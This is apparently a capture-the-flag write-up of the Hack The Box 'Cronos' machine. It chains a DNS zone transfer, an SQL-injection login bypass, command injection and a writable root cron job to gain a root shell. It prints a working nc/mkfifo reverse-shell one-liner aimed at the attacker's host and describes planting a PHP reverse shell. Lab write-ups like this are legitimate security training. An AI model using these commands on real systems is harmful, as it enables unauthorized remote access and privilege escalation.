Ethical Hacking Lessons — Cronos Writeup

This write-up is for the hackthebox Cronos machine. DNS Zone Transfer is the mechanism to replicate DNS records across multiple Servers. However, if not configured properly, the information leakage caused by that misconfiguration can provide attackers some vital clues about the attack vectors. This write-up shows how the information from DNS Zone transfer chained with other vulnerabilities may lead to an attacker owning critical infrastructure.

A medium rated Linux machine with an IP address of 10.10.10.13. Below is its radar graph.

NMap’s TCP ports scan results are shown below.

NMap scan for all UDP ports was taking too long. I performed a top 1000 UDP port scan as shown below.

Recon Results Analysis

Scan results reveal DNS port open on TCP and UDP on this box. We also found HTTP and SSH ports open the target device as well.

Enumeration

Let’s start with the enumerating port 80 by browsing to the home page that is showing Apache Ubuntu default page.

Wappalyzer browser plugin shows the following information about the web-server and the operating system, nothing earth-shattering here.

I ran other tools like nikto, DirBuster but did not find anything very useful. Typically enumerating a web-site could become a lengthy task. There is a lot more that we can try but let’s move on to the DNS enumeration for now.

As we noticed during the scan results both the TCP and UDP ports were open for DNS. Typically DNS only has a UDP port open. However, TCP port is open for a scenario such as DNS zone transfer, DNSSec, IPV6, etc. Since this box has DNS services running on TCP port, its worth investigating this further.

We can start with the NsLookup tool that is used to query the DNS records. Running it against the IP address provided us the domain name cronos.htb

Let’s add it to the /etc/hosts file.

We can then used host command with -l switch to list all the hosts in the domain.

This revealed another domain admin.cronos.htb. With the right set of words list, we potentially find this domain name through brute-forcing as well. Let’s add that into /etc/hosts file as well.

Browsing to this sub-domain brings up the following panel.

The source code for this page didn’t show anything interesting.

I tried different combinations of username/password without any luck. So I decided to give SQL Injection a try. After trying many many combinations from various possibilities, the following entry from this cheatsheet worked for me.

It brought me to the following page.

Clicking on the Execute did not seem to do much. However, the dropdown has a ping option too.

When I clicked Execute with the Ping option, I got the following result.

This means that there could be a possibility for some sort of command injection. So I decided to take it to the next step by attempting to run a whoami command as follows.

This came back as www-data output.

That’s great.

Enum Analysis

Enumeration found that the admin portal has a command injection vulnerability. We can attempt to exploit it to get the needed flags.

Exploitation

In order to exploit the command line injection, I tried various tricks from PenTestMoneky reverse-shell cheatsheet and the following script worked for me with IP and port updated for my box.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 4444 >/tmp/f

I basically entered this script in the admin portal.

Of course, I launched a listener on my box on the same port 4444.

And then hitting the Execute button gave me a low-privilege shell and the user flag as shown below.

Privilege Escalation

Now that we got an initial foothold, its time to attempt privilege escalation to try to get to the root flag. However, the current shell is not an interactive one, so let’s try to upgrade it with the following steps.

1. Spawn a bin bash shell using python script.
2. Background current shell using ctrl+z.
3. Change the current stty to type raw and echo input character by using stty raw -echo.
4. Lastly, bring the listener shell to the foreground by typing fg and then hit Enter twice.

In order to find options for privilege escalation, I downloaded the LinEnum script on my attack machine. I launched the web-server on the attack machine as follows.

I then downloaded this script on target machine.

Running this script on the target machine provided some useful information. One key piece of that info found related to crontab is shown in the image below.

Crontab is the list of programs that are scheduled to run on the system. The * * * * * at the start of the line indicates that this particular job is scheduled to run every minute. Also, this particular job runs as privileged user root. Finally, the currently logged-in user (www-data) should have all permission on this file (/var/www/laravel/artisan) that is scheduled to run once a minute.

We can verify that www-data user has the necessary permission on the /var/www/laravel/artisan file.

The contents of the artisan file seem to be related to some sort of application class loader.

If we can change these file contents so that executing it can initiate a shell back to our attack machine, that code will execute with root privileges which in turn can provide us a root shell. Let’s head back to PenTestMonkey PHP reverse shell as this file is a PHP script. We will have to make necessary changes in this script for attack machine IP address and the listening port.

Now download this script to the victim machine.

Launch a listener on attack machine on port 4445.

Now just wait for the cron job to run and within a minute we got a root shell and its flag.

Root Cause Analysis

Multiple attack vectors found in this box.

• DNS Zone transfer should be allowed from trusted sets of hosts.
• Web-site has SQL and Command injection vulnerabilities.